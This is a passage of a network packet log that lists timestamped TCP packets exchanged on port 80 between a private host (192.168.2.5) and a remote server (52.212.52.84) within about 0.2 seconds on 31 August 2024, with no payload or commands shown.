Aug 31, 2024 15:44:05.226142883 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.226152897 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.226161003 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.226166964 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.226171970 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.226182938 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.226195097 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.226218939 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.226246119 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.226423979 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.226433992 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.226443052 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.226486921 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.226576090 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.226586103 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.226591110 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.226596117 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.226602077 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.226636887 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.226648092 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.226660013 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.226661921 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.226670980 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.226680994 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.226700068 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.226731062 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.227267981 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.227283001 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.227293015 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.227310896 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.227319956 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.227328062 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.227330923 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.227340937 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.227363110 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.227380991 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.227448940 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.227459908 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.227468014 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.227478027 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.227488041 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.227525949 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.227550030 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.228313923 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.228326082 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.228337049 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.228344917 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.228349924 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.228358030 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.228373051 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.228378057 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.228389025 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.228393078 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.228399992 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.228409052 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.228415966 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.228425980 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.228435993 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.228442907 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.228472948 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.316997051 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.317007065 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.317023039 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.317034006 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.317044020 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.317101002 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.317130089 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.317140102 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.317146063 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.317171097 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.317172050 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.317183018 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.317198038 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.317214012 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.317245007 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.317390919 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.317400932 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.317409992 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.317445040 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.317464113 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.317476034 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.317478895 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.317521095 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.317713022 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.317728996 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.317738056 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.317747116 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.317756891 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.317764997 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.317770958 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.317775965 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.317785978 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.317796946 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.317804098 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.317836046 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.318203926 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.318214893 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.318257093 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.318289042 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.318366051 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.318382978 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.318392992 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.318402052 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.318413019 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.318419933 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.318422079 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.318434000 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.318442106 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.318448067 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.318451881 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.318464994 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.318475008 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.318485022 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.318485022 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.318495989 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.318507910 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.318514109 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.318519115 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.318535089 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.318553925 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.318567991 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.319175959 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.319188118 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.319196939 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.319205999 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.319216013 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.319228888 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.319235086 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.319288015 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.319298983 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.319308996 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.319318056 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.319328070 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.319328070 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.319338083 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.319348097 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.319358110 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.319369078 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.319369078 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.319380045 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.319396973 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.319421053 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.320050955 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.320060968 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.320070982 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.320115089 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.320132017 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.320233107 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.320242882 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.320251942 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.320261002 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.320270061 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.320278883 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.320287943 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.320287943 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.320303917 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.320313931 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.320322990 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.320331097 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.320333004 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.320343971 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.320348978 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.320357084 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.320359945 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.320385933 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.320405006 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.320991039 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.321001053 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.321012020 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.321058035 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.321091890 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.408020973 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408082962 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.408123016 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408133030 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408144951 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408154964 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408163071 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408169985 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.408179045 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408199072 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408200026 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.408210039 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408220053 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408226967 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.408229113 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408241034 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408248901 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.408252001 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408262968 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408267975 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.408272982 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408284903 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.408286095 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408325911 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.408358097 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.408637047 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408647060 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408658028 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408668041 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408678055 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408688068 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408689976 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.408699989 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408713102 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.408731937 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.408751011 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.408780098 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408790112 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408799887 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408811092 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408822060 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.408845901 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.408916950 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.408967018 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.409043074 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409053087 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409064054 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409074068 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409084082 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409092903 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409095049 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.409104109 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409113884 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409122944 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.409122944 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409133911 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409142971 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.409145117 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409156084 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409162045 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.409177065 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.409200907 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.409380913 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409430981 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.409580946 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409593105 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409609079 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409617901 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409627914 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409634113 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.409637928 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409647942 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409657001 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409661055 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.409667015 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409682989 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.409683943 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409693956 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.409698009 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409708977 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409714937 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.409720898 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409733057 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409742117 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409753084 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409761906 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.409763098 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409784079 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409792900 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409794092 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.409804106 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409812927 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409815073 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.409823895 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409837961 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409840107 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.409851074 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.409868956 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.409892082 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.410526037 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.410536051 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.410545111 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.410554886 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.410566092 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.410581112 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.410583019 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.410594940 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.410597086 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.410605907 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.410615921 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.410620928 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.410636902 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.410644054 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.410646915 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.410659075 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.410665989 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.410669088 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.410680056 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.410691023 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.410695076 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.410703897 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.410713911 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.410717010 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.410723925 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.410733938 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.410736084 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.410743952 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.410753965 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.410756111 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.410763979 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.410770893 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.410777092 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.410787106 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.410793066 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.410799026 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.410804033 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.410839081 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.411392927 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.411405087 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.411413908 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.411422968 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.411432981 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.411442995 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.411444902 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.411462069 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.411463976 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.411472082 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.411482096 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.411483049 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.411492109 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.411501884 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.411504030 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.411518097 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.411524057 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.411530972 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.411540985 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.411550045 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.411557913 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.411567926 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.411578894 CEST	80	49713	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:05.411578894 CEST	49713	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:05.411590099 CEST	80	49713	52.212.52.84	192.168.2.5
